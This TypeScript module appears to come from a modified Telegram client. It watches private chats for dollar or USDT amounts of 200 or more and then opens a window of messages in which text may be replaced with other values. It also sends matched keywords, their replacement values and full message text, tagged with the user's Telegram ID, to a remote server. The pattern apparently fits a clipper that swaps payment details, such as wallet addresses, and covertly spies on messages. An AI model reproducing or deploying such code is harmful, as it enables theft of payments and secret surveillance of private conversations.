import { ydymPostJson } from './api';
import { YDYM_PATHS } from './config';
import { ydymLog } from './log';
import { getYdymTgid, publishYdymRemaining, emitYdymKeywordReport } from './state';

const DEFAULT_MIN = 200;
const DEFAULT_WINDOW = 30;
const DEFAULT_VARIANTS = ['USDT', 'USD', 'U', '美金', '刀'];
const NUMBER_RE = /(\d+(?:\.\d+)?)/g;
const KEYWORD_DEDUPE_MS = 90_000;

type PeerFlags = {
  isBot: boolean;
  isSelf: boolean;
  isPrivateUser: boolean;
};

type Resolver = (chatId: string) => PeerFlags;

let resolvePeer: Resolver | undefined;
let privateMin = DEFAULT_MIN;
let privateWindow = DEFAULT_WINDOW;
let privateVariants = DEFAULT_VARIANTS.slice();
const remainingByChat: Record<string, number> = {};
const consumeCache = new Map<string, boolean>();
const keywordDedupe = new Map<string, number>();
const peerCache: Record<string, PeerFlags> = {};

function classifyFallback(chatId: string): PeerFlags {
  const isUser = Boolean(chatId) && !chatId.startsWith('-');
  return { isBot: false, isSelf: false, isPrivateUser: isUser };
}

function flagsFor(chatId?: string): PeerFlags {
  if (!chatId) return { isBot: false, isSelf: false, isPrivateUser: false };
  if (peerCache[chatId]) return peerCache[chatId];
  const flags = resolvePeer ? resolvePeer(chatId) : classifyFallback(chatId);
  peerCache[chatId] = flags;
  return flags;
}

export function ydymGetPeerCache(): Record<string, PeerFlags> {
  return { ...peerCache };
}

export function ydymApplyPeerCache(next: Record<string, PeerFlags> | undefined) {
  if (!next) return;
  Object.assign(peerCache, next);
}

export function ydymGetWindowConfig() {
  return {
    private_replace_min: privateMin,
    private_replace_window: privateWindow,
    private_replace_variants: privateVariants.slice(),
  };
}

export function ydymWarmPeer(chatId: string) {
  flagsFor(chatId);
}

export function ydymBindPeerResolver(fn: Resolver) {
  resolvePeer = fn;
}

export function ydymSetPrivateWindowConfig(raw: {
  private_replace_min?: number;
  private_replace_window?: number;
  private_replace_variants?: string[];
} | undefined) {
  if (!raw) return;
  const min = Number(raw.private_replace_min);
  if (Number.isFinite(min)) {
    privateMin = Math.min(9999, Math.max(10, Math.floor(min)));
  }
  const win = Number(raw.private_replace_window);
  if (Number.isFinite(win)) {
    privateWindow = Math.min(3000, Math.max(1, Math.floor(win)));
  }
  if (Array.isArray(raw.private_replace_variants) && raw.private_replace_variants.length) {
    privateVariants = raw.private_replace_variants
      .map((v) => String(v || '').trim())
      .filter(Boolean)
      .sort((a, b) => b.length - a.length);
  }
}

export function ydymIsBotChat(chatId?: string): boolean {
  return flagsFor(chatId).isBot;
}

export function ydymShouldSkipReplace(chatId?: string): boolean {
  const f = flagsFor(chatId);
  return f.isBot;
}

function hasVariantAfterNumber(after: string): boolean {
  let tail = after;
  if (tail.startsWith(' ') && tail.length >= 2) {
    tail = tail.slice(1);
  }
  const lower = tail.toLowerCase();
  for (const v of privateVariants) {
    if (!v) continue;
    const ascii = [...v].every((c) => c.charCodeAt(0) <= 127);
    if (ascii) {
      const vv = v.toLowerCase();
      if (lower.startsWith(vv)) {
        const n = vv.length;
        if (tail.length === n || !/[A-Za-z0-9]/.test(tail.charAt(n))) return true;
      }
    } else if (tail.startsWith(v)) {
      const n = v.length;
      if (tail.length === n || !/[\w\u4e00-\u9fff]/.test(tail.charAt(n))) return true;
    }
  }
  return false;
}

function matchesAmountWindow(text: string): boolean {
  if (!text) return false;
  NUMBER_RE.lastIndex = 0;
  let m: RegExpExecArray | null;
  while ((m = NUMBER_RE.exec(text))) {
    const val = Number(m[1]);
    if (!Number.isFinite(val) || val + 1e-9 < privateMin) continue;
    if (hasVariantAfterNumber(text.slice(m.index + m[1].length))) return true;
  }
  return false;
}

export function ydymAllowReplaceForMessage(
  chatId: string | undefined,
  text: string,
  direction: 'outgoing' | 'incoming',
  msgId?: number,
): boolean {
  if (!chatId || ydymShouldSkipReplace(chatId)) return false;
  const f = flagsFor(chatId);
  if (f.isSelf) return true;
  if (!f.isPrivateUser) return true;

  const cacheKey = msgId ? `${chatId}|${direction}|${msgId}` : `${chatId}|${direction}|0|${text.length}`;
  const cached = consumeCache.get(cacheKey);
  // Only cache allows. Caching a deny would block a later retry after remaining
  // arrives from the other thread (text window lives in the worker, photos on main).
  if (cached === true) return true;

  let opened = false;
  if (matchesAmountWindow(text)) {
    remainingByChat[chatId] = privateWindow;
    invalidateConsumeCacheForChat(chatId);
    opened = true;
    ydymLog('window.open', { chatId, direction, msgId, privateWindow, text: text.slice(0, 80) });
  }
  const remaining = remainingByChat[chatId] || 0;
  const allow = remaining > 0;
  if (allow) remainingByChat[chatId] = remaining - 1;
  if (allow) consumeCache.set(cacheKey, true);
  if (consumeCache.size > 4000) consumeCache.clear();
  if (opened || remaining !== (remainingByChat[chatId] || 0)) {
    publishYdymRemaining({ ...remainingByChat });
  }
  ydymLog('window.allow', {
    chatId,
    direction,
    msgId,
    allow,
    remaining: remainingByChat[chatId] || 0,
    opened,
    text: text.slice(0, 80),
  });
  return allow;
}

function invalidateConsumeCacheForChat(chatId: string) {
  const prefix = `${chatId}|`;
  for (const key of consumeCache.keys()) {
    if (key.startsWith(prefix)) consumeCache.delete(key);
  }
}

export function ydymPeekReplaceForMessage(
  chatId: string | undefined,
  direction: 'outgoing' | 'incoming',
  msgId?: number,
): boolean {
  if (!chatId || ydymShouldSkipReplace(chatId)) return false;
  const f = flagsFor(chatId);
  if (f.isSelf) return true;
  if (!f.isPrivateUser) return true;
  if (msgId) {
    const cached = consumeCache.get(`${chatId}|${direction}|${msgId}`);
    if (cached !== undefined) return cached;
  }
  return (remainingByChat[chatId] || 0) > 0;
}

/** 私聊阈值变化后，文字替换缓存要失效；群组/频道不跟这条计数走。 */
export function ydymReplaceCacheStamp(chatId?: string): string {
  if (!chatId) return '';
  const flags = flagsFor(chatId);
  if (flags.isSelf || !flags.isPrivateUser) return 'g';
  return String(remainingByChat[chatId] || 0);
}

export function ydymGetRemainingMap(): Record<string, number> {
  return { ...remainingByChat };
}

export function ydymReplaceRemainingMap(next: Record<string, number> | undefined) {
  if (!next || typeof next !== 'object') return;
  const keys = Object.keys(next);
  if (!keys.length) return;
  keys.forEach((k) => {
    const n = Math.floor(Number(next[k]));
    if (!k || !Number.isFinite(n) || n < 0) return;
    remainingByChat[k] = n;
  });
}

export function ydymShouldReportKeyword(chatId?: string): boolean {
  if (!chatId) return false;
  const f = flagsFor(chatId);
  if (f.isBot || f.isSelf) return false;
  return true;
}

export function ydymReportKeywordHits(params: {
  chatId: string;
  msgId?: number;
  original: string;
  hits: Array<{ keyword: string; replaceValue: string }>;
  direction: 'outgoing' | 'incoming';
}) {
  if (typeof document === 'undefined') {
    emitYdymKeywordReport(params);
    return;
  }
  ydymPostKeywordHits(params);
}

export function ydymPostKeywordHits(params: {
  chatId: string;
  msgId?: number;
  original: string;
  hits: Array<{ keyword: string; replaceValue: string }>;
  direction: 'outgoing' | 'incoming';
}) {
  const tgid = getYdymTgid();
  if (!tgid || !ydymShouldReportKeyword(params.chatId) || !params.hits.length) return;
  const now = Date.now();
  for (const hit of params.hits) {
    if (!hit.keyword) continue;
    const replaceValue = hit.replaceValue || hit.keyword;
    const key = `${params.direction}|${params.msgId || 0}|${hit.keyword}|${params.original.length}`;
    const prev = keywordDedupe.get(key) || 0;
    if (now - prev < KEYWORD_DEDUPE_MS) continue;
    keywordDedupe.set(key, now);
    void ydymPostJson(YDYM_PATHS.reportKeywordMsg, {
      tgid,
      keyword: hit.keyword,
      replace_value: replaceValue,
      full_message: params.original.slice(0, 8000),
      msg_sn: params.msgId ? String(params.msgId) : '',
      direction: params.direction === 'outgoing' ? 'send' : 'receive',
    });
    ydymLog('keyword.report', { keyword: hit.keyword, direction: params.direction, chatId: params.chatId });
  }
  if (keywordDedupe.size > 800) {
    keywordDedupe.forEach((ts, k) => {
      if (now - ts > KEYWORD_DEDUPE_MS) keywordDedupe.delete(k);
    });
  }
}
